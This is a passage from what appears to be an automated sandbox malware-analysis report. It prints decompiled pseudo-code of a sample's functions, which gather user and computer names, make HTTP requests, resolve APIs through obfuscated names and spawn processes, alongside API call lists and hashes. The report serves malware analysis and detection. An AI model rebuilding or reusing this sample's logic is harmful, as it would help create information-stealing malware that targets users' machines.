            				}
            				_t166 =  *0x202a3cc; // 0x2ca9600
            				_t89 = E02026B59( &E0202A00A, _t166 + 4);
            				_t172 = 0;
            				_a16 = _t89;
            				if(_t89 == 0) {
            					L30:
            					HeapFree( *0x202a2d8, _t172, _t152);
            					return _a44;
            				} else {
            					_t92 = RtlAllocateHeap( *0x202a2d8, 0, 0x800);
            					_a24 = _t92;
            					if(_t92 == 0) {
            						L29:
            						HeapFree( *0x202a2d8, _t172, _a8);
            						goto L30;
            					}
            					E02022915(GetTickCount());
            					_t96 =  *0x202a3cc; // 0x2ca9600
            					__imp__(_t96 + 0x40);
            					asm("lock xadd [eax], ecx");
            					_t100 =  *0x202a3cc; // 0x2ca9600
            					__imp__(_t100 + 0x40);
            					_t102 =  *0x202a3cc; // 0x2ca9600
            					_t168 = E02026675(1, _t164, _t152,  *_t102);
            					asm("lock xadd [eax], ecx");
            					if(_t168 == 0) {
            						L28:
            						HeapFree( *0x202a2d8, _t172, _a16);
            						goto L29;
            					}
            					StrTrimA(_t168, 0x2029280);
            					_push(_t168);
            					_t108 = E02027563();
            					_v12 = _t108;
            					if(_t108 == 0) {
            						L27:
            						HeapFree( *0x202a2d8, _t172, _t168);
            						goto L28;
            					}
            					_t173 = __imp__;
            					 *_t173(_t168, _a8);
            					 *_t173(_a4, _v12);
            					_t174 = __imp__;
            					 *_t174(_v4, _v24);
            					_t175 = E02026536( *_t174(_v12, _t168), _v20);
            					_v36 = _t175;
            					if(_t175 == 0) {
            						_v8 = 8;
            						L25:
            						E020263F6();
            						L26:
            						HeapFree( *0x202a2d8, 0, _v40);
            						_t172 = 0;
            						goto L27;
            					}
            					_t118 = E02026F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
            					_v12 = _t118;
            					if(_t118 == 0) {
            						_t178 = _v24;
            						_v20 = E0202597D(_t178, _t175, _v16, _v12);
            						_t126 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
            						_t128 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t128 + 8))(_t128);
            						_t130 =  *((intOrPtr*)(_t178 + 4));
            						 *((intOrPtr*)( *_t130 + 8))(_t130);
            						_t132 =  *_t178;
            						 *((intOrPtr*)( *_t132 + 8))(_t132);
            						E020261DA(_t178);
            					}
            					if(_v8 != 0x10d2) {
            						L20:
            						if(_v8 == 0) {
            							_t120 = _v16;
            							if(_t120 != 0) {
            								_t121 =  *_t120;
            								_t176 =  *_v12;
            								_v16 = _t121;
            								wcstombs(_t121, _t121,  *_v12);
            								 *_v24 = E0202673A(_v16, _v16, _t176 >> 1);
            							}
            						}
            						goto L23;
            					} else {
            						if(_v16 != 0) {
            							L23:
            							E020261DA(_v32);
            							if(_v12 == 0 || _v8 == 0x10d2) {
            								goto L26;
            							} else {
            								goto L25;
            							}
            						}
            						_v8 = _v8 & 0x00000000;
            						goto L20;
            					}
            				}
            			}

            Per-line instruction addresses for E02022B91: 0x02022b91 to 0x02022eff; 0x00000000 marks a decompiled line with no code address.

            APIs
            • GetTickCount.KERNEL32 ref: 02022BA8
            • wsprintfA.USER32 ref: 02022BF5
            • wsprintfA.USER32 ref: 02022C12
            • wsprintfA.USER32 ref: 02022C34
            • wsprintfA.USER32 ref: 02022C5B
            • wsprintfA.USER32 ref: 02022C7C
            • wsprintfA.USER32 ref: 02022CA7
            • HeapFree.KERNEL32(00000000,?), ref: 02022CBA
            • wsprintfA.USER32 ref: 02022CD9
            • HeapFree.KERNEL32(00000000,?), ref: 02022CEA
              • Part of subcall function 02026B59: RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02026B75
              • Part of subcall function 02026B59: RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 02026B93
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02022D19
            • GetTickCount.KERNEL32 ref: 02022D2B
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02022D3F
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 02022D5D
              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A0
              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A8
              • Part of subcall function 02026675: strcpy.NTDLL ref: 020266BF
              • Part of subcall function 02026675: lstrcat.KERNEL32(00000000,00000000), ref: 020266CA
              • Part of subcall function 02026675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266E7
            • StrTrimA.SHLWAPI(00000000,02029280,?,02CA9600), ref: 02022D8F
              • Part of subcall function 02027563: lstrlen.KERNEL32(02CA9C10,00000000,00000000,00000000,02023EF9,00000000), ref: 02027573
              • Part of subcall function 02027563: lstrlen.KERNEL32(?), ref: 0202757B
              • Part of subcall function 02027563: lstrcpy.KERNEL32(00000000,02CA9C10), ref: 0202758F
              • Part of subcall function 02027563: lstrcat.KERNEL32(00000000,?), ref: 0202759A
            • lstrcpy.KERNEL32(00000000,?), ref: 02022DB2
            • lstrcpy.KERNEL32(?,?), ref: 02022DBC
            • lstrcat.KERNEL32(?,?), ref: 02022DCC
            • lstrcat.KERNEL32(?,00000000), ref: 02022DD3
              • Part of subcall function 02026536: lstrlen.KERNEL32(?,00000000,02CA9E18,00000000,02026F0A,02CAA03B,43175AC3,?,?,?,?,43175AC3,00000005,0202A00C,4D283A53,?), ref: 0202653D
              • Part of subcall function 02026536: mbstowcs.NTDLL ref: 02026566
              • Part of subcall function 02026536: memset.NTDLL ref: 02026578
            • wcstombs.NTDLL ref: 02022E76
              • Part of subcall function 0202597D: SysAllocString.OLEAUT32(?), ref: 020259B8
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • HeapFree.KERNEL32(00000000,?), ref: 02022EBF
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02022ECB
            • HeapFree.KERNEL32(00000000,?,?,02CA9600), ref: 02022ED8
            • HeapFree.KERNEL32(00000000,?), ref: 02022EE5
            • HeapFree.KERNEL32(00000000,?), ref: 02022EEF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
            • String ID: Uet
            • API String ID: 1185349883-2766386878
            • Opcode ID: 836d654cd3a77a2d053e82c13f2fa2ab452557d0feee056910e3de56822d57cd
            • Instruction ID: f1c64b7985f595dee5422b2d22f5cc6e0e9026f76191a9003f6f60c0d6d20c60
            • Opcode Fuzzy Hash: 836d654cd3a77a2d053e82c13f2fa2ab452557d0feee056910e3de56822d57cd
            • Instruction Fuzzy Hash: 2FA18E71A00324AFCB21DB64DC84E9A7BE9FF48714F26092AF848D7220DB35D95DEB51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E020237DF(void* __eax, void* __ecx) {
            				long _v8;
            				char _v12;
            				void* _v16;
            				void* _v28;
            				long _v32;
            				void _v104;
            				char _v108;
            				long _t36;
            				intOrPtr _t40;
            				intOrPtr _t47;
            				intOrPtr _t50;
            				void* _t58;
            				void* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t71;
            
            				_t1 = __eax + 0x14; // 0x74183966
            				_t69 =  *_t1;
            				_t36 = E02026BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
            				_v8 = _t36;
            				if(_t36 != 0) {
            					L12:
            					return _v8;
            				}
            				E02027AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
            				_t40 = _v12(_v12);
            				_v8 = _t40;
            				if(_t40 == 0 && ( *0x202a300 & 0x00000001) != 0) {
            					_v32 = 0;
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					_v108 = 0;
            					memset( &_v104, 0, 0x40);
            					_t47 =  *0x202a348; // 0xc7d5a8
            					_t18 = _t47 + 0x202b706; // 0x73797325
            					_t68 = E0202127E(_t18);
            					if(_t68 == 0) {
            						_v8 = 8;
            					} else {
            						_t50 =  *0x202a348; // 0xc7d5a8
            						_t19 = _t50 + 0x202b86c; // 0x2ca8e14
            						_t20 = _t50 + 0x202b3f6; // 0x4e52454b
            						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
            						if(_t71 == 0) {
            							_v8 = 0x7f;
            						} else {
            							_v108 = 0x44;
            							E02025B56();
            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
            							_push(1);
            							E02025B56();
            							if(_t58 == 0) {
            								_v8 = GetLastError();
            							} else {
            								CloseHandle(_v28);
            								CloseHandle(_v32);
            							}
            						}
            						HeapFree( *0x202a2d8, 0, _t68);
            					}
            				}
            				_t70 = _v16;
            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
            				E020261DA(_t70);
            				goto L12;
            			}

            Per-line instruction addresses for E020237DF: 0x020237e7 to 0x02023916; 0x00000000 marks a decompiled line with no code address.

            APIs
              • Part of subcall function 02026BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,020237FB,?,?,?,?,00000000,00000000), ref: 02026C1E
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02026C40
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02026C56
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02026C6C
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02026C82
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02026C98
            • memset.NTDLL ref: 02023849
              • Part of subcall function 0202127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02023862,73797325), ref: 0202128F
              • Part of subcall function 0202127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 020212A9
            • GetModuleHandleA.KERNEL32(4E52454B,02CA8E14,73797325), ref: 0202387F
            • GetProcAddress.KERNEL32(00000000), ref: 02023886
            • HeapFree.KERNEL32(00000000,00000000), ref: 020238EE
              • Part of subcall function 02025B56: GetProcAddress.KERNEL32(36776F57,02022425), ref: 02025B71
            • CloseHandle.KERNEL32(00000000,00000001), ref: 020238CB
            • CloseHandle.KERNEL32(?), ref: 020238D0
            • GetLastError.KERNEL32(00000001), ref: 020238D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3075724336-1616585941
            • Opcode ID: 261973659fa47aab88cc1079d56f9fd2b59f5d5d0dd08c375d821881d30dfddf
            • Instruction ID: 2f2638ef6b297eb6c3aeaf6d2db735061ffe57f5f5c29c3a7ab9814a445f63eb
            • Opcode Fuzzy Hash: 261973659fa47aab88cc1079d56f9fd2b59f5d5d0dd08c375d821881d30dfddf
            • Instruction Fuzzy Hash: 76310EB1D0031CAFDB21AFA4DC88EDEBBBDEB08304F114466E605A7511D7399A5CDB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02023FA5(void* __ecx, void* __esi) {
            				long _v8;
            				long _v12;
            				long _v16;
            				long _v20;
            				long _t34;
            				long _t39;
            				long _t42;
            				long _t56;
            				void* _t58;
            				void* _t59;
            				void* _t61;
            
            				_t61 = __esi;
            				_t59 = __ecx;
            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
            				do {
            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
            					_v20 = _t34;
            					if(_t34 != 0) {
            						L3:
            						_v8 = 4;
            						_v16 = 0;
            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
            							_t39 = GetLastError();
            							_v12 = _t39;
            							if(_v20 == 0 || _t39 != 0x2ef3) {
            								L15:
            								return _v12;
            							} else {
            								goto L11;
            							}
            						}
            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
            							goto L11;
            						} else {
            							_v16 = 0;
            							_v8 = 0;
            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
            							_t58 = E020233DC(_v8 + 1);
            							if(_t58 == 0) {
            								_v12 = 8;
            							} else {
            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
            									E020261DA(_t58);
            									_v12 = GetLastError();
            								} else {
            									 *((char*)(_t58 + _v8)) = 0;
            									 *(_t61 + 0xc) = _t58;
            								}
            							}
            							goto L15;
            						}
            					}
            					SetEvent( *(_t61 + 0x1c));
            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
            					_v12 = _t56;
            					if(_t56 != 0) {
            						goto L15;
            					}
            					goto L3;
            					L11:
            					_t42 = E020216B2( *(_t61 + 0x1c), _t59, 0xea60);
            					_v12 = _t42;
            				} while (_t42 == 0);
            				goto L15;
            			}

            APIs
            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,746981D0,00000000,00000000), ref: 02023FBC
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?), ref: 02023FCC
            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02023FFE
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02024023
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02024043
            • GetLastError.KERNEL32 ref: 02024055
              • Part of subcall function 020216B2: WaitForMultipleObjects.KERNEL32(00000002,02027C47,00000000,02027C47,?,?,?,02027C47,0000EA60), ref: 020216CD
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • GetLastError.KERNEL32(00000000), ref: 0202408A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
            • String ID: @MetNet
            • API String ID: 3369646462-2109406137
            • Opcode ID: 3f281b9645d0c46f4c77e3d50806c355223f6bee6fe0cc3a96d14a4a9aa358ea
            • Instruction ID: bb566f88513e17a76e29dfb1dd6e1ddb39d25c55bfb6cb3585e3033f0a566a26
            • Opcode Fuzzy Hash: 3f281b9645d0c46f4c77e3d50806c355223f6bee6fe0cc3a96d14a4a9aa358ea
            • Instruction Fuzzy Hash: 3B31CBB5D0031DEFDB21DFA5C8C4A9EBBF8BB08704F10496AE542A2141D775AA88EF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 43%
            			E02027238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v20;
            				intOrPtr _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t58;
            				signed int _t60;
            				signed int _t62;
            				intOrPtr _t64;
            				intOrPtr _t66;
            				intOrPtr _t70;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            				intOrPtr _t80;
            				WCHAR* _t83;
            				void* _t84;
            				void* _t85;
            				void* _t86;
            				intOrPtr _t92;
            				intOrPtr* _t102;
            				signed int _t103;
            				void* _t104;
            				intOrPtr _t105;
            				void* _t107;
            				intOrPtr* _t115;
            				void* _t119;
            				intOrPtr _t125;
            
            				_t58 =  *0x202a3dc; // 0x2ca9cc0
            				_v24 = _t58;
            				_v28 = 8;
            				_v20 = GetTickCount();
            				_t60 = E02026ABD();
            				_t103 = 5;
            				_t98 = _t60 % _t103 + 6;
            				_t62 = E02026ABD();
            				_t117 = _t62 % _t103 + 6;
            				_v32 = _t62 % _t103 + 6;
            				_t64 = E020242E9(_t60 % _t103 + 6);
            				_v16 = _t64;
            				if(_t64 != 0) {
            					_t66 = E020242E9(_t117);
            					_v12 = _t66;
            					if(_t66 != 0) {
            						_push(5);
            						_t104 = 0xa;
            						_t119 = E0202398D(_t104,  &_v20);
            						if(_t119 == 0) {
            							_t119 = 0x202918c;
            						}
            						_t70 = E02025FA1(_v24);
            						_v8 = _t70;
            						if(_t70 != 0) {
            							_t115 = __imp__;
            							_t72 =  *_t115(_t119);
            							_t75 =  *_t115(_v8);
            							_t76 =  *_t115(_a4);
            							_t80 = E020233DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
            							_v24 = _t80;
            							if(_t80 != 0) {
            								_t105 =  *0x202a348; // 0xc7d5a8
            								_t102 =  *0x202a138; // 0x2027ddd
            								_t28 = _t105 + 0x202bd10; // 0x530025
            								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
            								_push(4);
            								_t107 = 5;
            								_t83 = E0202398D(_t107,  &_v20);
            								_a8 = _t83;
            								if(_t83 == 0) {
            									_a8 = 0x2029190;
            								}
            								_t84 =  *_t115(_a8);
            								_t85 =  *_t115(_v8);
            								_t86 =  *_t115(_a4);
            								_t125 = E020233DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
            								if(_t125 == 0) {
            									E020261DA(_v24);
            								} else {
            									_t92 =  *0x202a348; // 0xc7d5a8
            									_t44 = _t92 + 0x202ba20; // 0x73006d
            									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
            									 *_a16 = _v24;
            									_v28 = _v28 & 0x00000000;
            									 *_a20 = _t125;
            								}
            							}
            							E020261DA(_v8);
            						}
            						E020261DA(_v12);
            					}
            					E020261DA(_v16);
            				}
            				return _v28;
            			}

            APIs
            • GetTickCount.KERNEL32 ref: 02027250
            • lstrlen.KERNEL32(00000000,00000005), ref: 020272D1
            • lstrlen.KERNEL32(?), ref: 020272E2
            • lstrlen.KERNEL32(00000000), ref: 020272E9
            • lstrlenW.KERNEL32(80000002), ref: 020272F0
            • lstrlen.KERNEL32(?,00000004), ref: 02027359
            • lstrlen.KERNEL32(?), ref: 02027362
            • lstrlen.KERNEL32(?), ref: 02027369
            • lstrlenW.KERNEL32(?), ref: 02027370
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlen$CountFreeHeapTick
            • String ID:
            • API String ID: 2535036572-0
            • Opcode ID: 0a3e4e2579f3ab0e2529fd63e73a71961c2e045c4e2c3c19b4614ae3adcffde6
            • Instruction ID: 172b767867b5d3b6c82076f163f261c17a55754436d71f54995277c2b5e4c75c
            • Opcode Fuzzy Hash: 0a3e4e2579f3ab0e2529fd63e73a71961c2e045c4e2c3c19b4614ae3adcffde6
            • Instruction Fuzzy Hash: 35517E32D00329ABCF12AFA5CD84ADE7BB6EF44314F154066E904A7250DB35DA29EF94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02021340() {
            				long _v8;
            				long _v12;
            				int _v16;
            				long _t39;
            				long _t43;
            				signed int _t47;
            				short _t51;
            				signed int _t52;
            				int _t56;
            				int _t57;
            				char* _t64;
            				short* _t67;
            
            				_v16 = 0;
            				_v8 = 0;
            				GetUserNameW(0,  &_v8);
            				_t39 = _v8;
            				if(_t39 != 0) {
            					_v12 = _t39;
            					_v8 = 0;
            					GetComputerNameW(0,  &_v8);
            					_t43 = _v8;
            					if(_t43 != 0) {
            						_t11 = _t43 + 2; // 0x76b5c742
            						_v12 = _v12 + _t11;
            						_t64 = E020233DC(_v12 + _t11 << 2);
            						if(_t64 != 0) {
            							_t47 = _v12;
            							_t67 = _t64 + _t47 * 2;
            							_v8 = _t47;
            							if(GetUserNameW(_t67,  &_v8) == 0) {
            								L7:
            								E020261DA(_t64);
            							} else {
            								_t51 = 0x40;
            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
            								_t52 = _v8;
            								_v12 = _v12 - _t52;
            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
            									goto L7;
            								} else {
            									_t56 = _v12 + _v8;
            									_t31 = _t56 + 2; // 0x2023e01
            									_v12 = _t56;
            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
            									_v8 = _t57;
            									if(_t57 == 0) {
            										goto L7;
            									} else {
            										_t64[_t57] = 0;
            										_v16 = _t64;
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v16;
            			}

            APIs
            • GetUserNameW.ADVAPI32(00000000,02023DFF), ref: 02021354
            • GetComputerNameW.KERNEL32(00000000,02023DFF), ref: 02021370
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetUserNameW.ADVAPI32(00000000,02023DFF), ref: 020213AA
            • GetComputerNameW.KERNEL32(02023DFF,76B5C740), ref: 020213CD
            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02023DFF,00000000,02023E01,00000000,00000000,?,76B5C740,02023DFF), ref: 020213F0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
            • String ID: @het
            • API String ID: 3850880919-3010869118
            • Opcode ID: 636985bdb2cc0dae92704a6a1b3abeea0299f80cc73e3206bc19933e40320496
            • Instruction ID: dd0249640c478a1f99a9a1bca4208c48eb402efab2361525a38dc1d1549badda
            • Opcode Fuzzy Hash: 636985bdb2cc0dae92704a6a1b3abeea0299f80cc73e3206bc19933e40320496
            • Instruction Fuzzy Hash: 1121D876900218FFCB15DFE5D9849EEBBB8EF48204B2144AAE609E7241DB349B49DB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E020254D8(intOrPtr _a4) {
            				void* _t2;
            				unsigned int _t4;
            				void* _t5;
            				long _t6;
            				void* _t7;
            				void* _t15;
            
            				_t2 = CreateEventA(0, 1, 0, 0);
            				 *0x202a30c = _t2;
            				if(_t2 == 0) {
            					return GetLastError();
            				}
            				_t4 = GetVersion();
            				if(_t4 != 5) {
            					L4:
            					if(_t15 <= 0) {
            						_t5 = 0x32;
            						return _t5;
            					}
            					L5:
            					 *0x202a2fc = _t4;
            					_t6 = GetCurrentProcessId();
            					 *0x202a2f8 = _t6;
            					 *0x202a304 = _a4;
            					_t7 = OpenProcess(0x10047a, 0, _t6);
            					 *0x202a2f4 = _t7;
            					if(_t7 == 0) {
            						 *0x202a2f4 =  *0x202a2f4 | 0xffffffff;
            					}
            					return 0;
            				}
            				if(_t4 >> 8 > 0) {
            					goto L5;
            				}
            				_t15 = _t4 - _t4;
            				goto L4;
            			}

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02025037,?), ref: 020254E0
            • GetVersion.KERNEL32 ref: 020254EF
            • GetCurrentProcessId.KERNEL32 ref: 0202550B
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02025528
            • GetLastError.KERNEL32 ref: 02025547
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
            • String ID: @MetNet
            • API String ID: 2270775618-2109406137
            • Opcode ID: f21a8c2d49daffbb5cd6661e6cdfce1c8bebce54807a866912d84a81abf5a820
            • Instruction ID: a4b612f505625edbb011ff0543bd10545223955904e9304c10e2de4e78cfa1fd
            • Opcode Fuzzy Hash: f21a8c2d49daffbb5cd6661e6cdfce1c8bebce54807a866912d84a81abf5a820
            • Instruction Fuzzy Hash: 3CF081B0AC03269FD7794F24AD69B183FA6B704751F720817E516C61C0DB7880ACCB19
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 02023ABD
            • SysAllocString.OLEAUT32(0070006F), ref: 02023AD1
            • SysAllocString.OLEAUT32(00000000), ref: 02023AE3
            • SysFreeString.OLEAUT32(00000000), ref: 02023B4B
            • SysFreeString.OLEAUT32(00000000), ref: 02023B5A
            • SysFreeString.OLEAUT32(00000000), ref: 02023B65
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 252734380883e8546887b4b16134d5d89351a51cb03b46a4a143bc0f9291ba6c
            • Instruction ID: f9417af7ac7c0d9488a436c26a6e8de09911e4c8db057c31cdb5e9bb0d955f67
            • Opcode Fuzzy Hash: 252734380883e8546887b4b16134d5d89351a51cb03b46a4a143bc0f9291ba6c
            • Instruction Fuzzy Hash: 4F417E36D00619AFDB02EFBCC845A9EB7BAEF49300F144466EA10EB120DB75D909CF91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02026BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
            				intOrPtr _v8;
            				intOrPtr _t23;
            				intOrPtr _t26;
            				_Unknown_base(*)()* _t28;
            				intOrPtr _t30;
            				_Unknown_base(*)()* _t32;
            				intOrPtr _t33;
            				_Unknown_base(*)()* _t35;
            				intOrPtr _t36;
            				_Unknown_base(*)()* _t38;
